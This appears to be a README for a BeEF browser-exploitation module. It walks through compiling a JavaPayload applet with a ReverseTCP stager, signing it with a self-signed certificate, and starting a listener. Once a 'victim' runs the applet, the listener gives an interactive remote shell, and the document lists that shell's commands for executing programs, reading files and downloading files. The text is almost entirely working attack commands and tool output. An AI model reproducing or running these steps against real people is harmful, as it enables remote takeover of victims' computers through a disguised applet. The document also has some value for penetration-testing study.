--- How to use this module --- The following is how you compile the JavaPayload handlers : $git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git $cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar $cd .. && ant compile && ant jar $cd build/bin $java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP At this point you have the applet ready to go, with a reverseTCP handler: Applet_ReverseTCP.jar Note that the applet in this module is already compiled (with Java 7, you might want to recompile it with Java 6 to run it on those versions too - SUGGESTED :-). At this stage you need to sign the applet. The following is to create a self-signed certificate and then sign it. Obviously if you have a valid code signing certificate, even better ;) keytool -keystore tmp -genkey jarsigner -keystore tmp Applet_ReverseTCP.jar mykey Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module. You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary): java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh Now launch the BeEF module. If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler: antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh ! help help: show information about commands. Usage: help [command] Supported commands: help - show this help info - list system properties pwd - show current directory cd - change directory ls - list directory exec - execute native command cat - show text file wget - download file telnet - create TCP connection paste - create text file jobs - list or continue jobs exit - Exit JSh When inside an interactive command, enter ~. on a new line to exit from that command. Enter ~& to background the command. Enter ~~ to start a line with a ~ character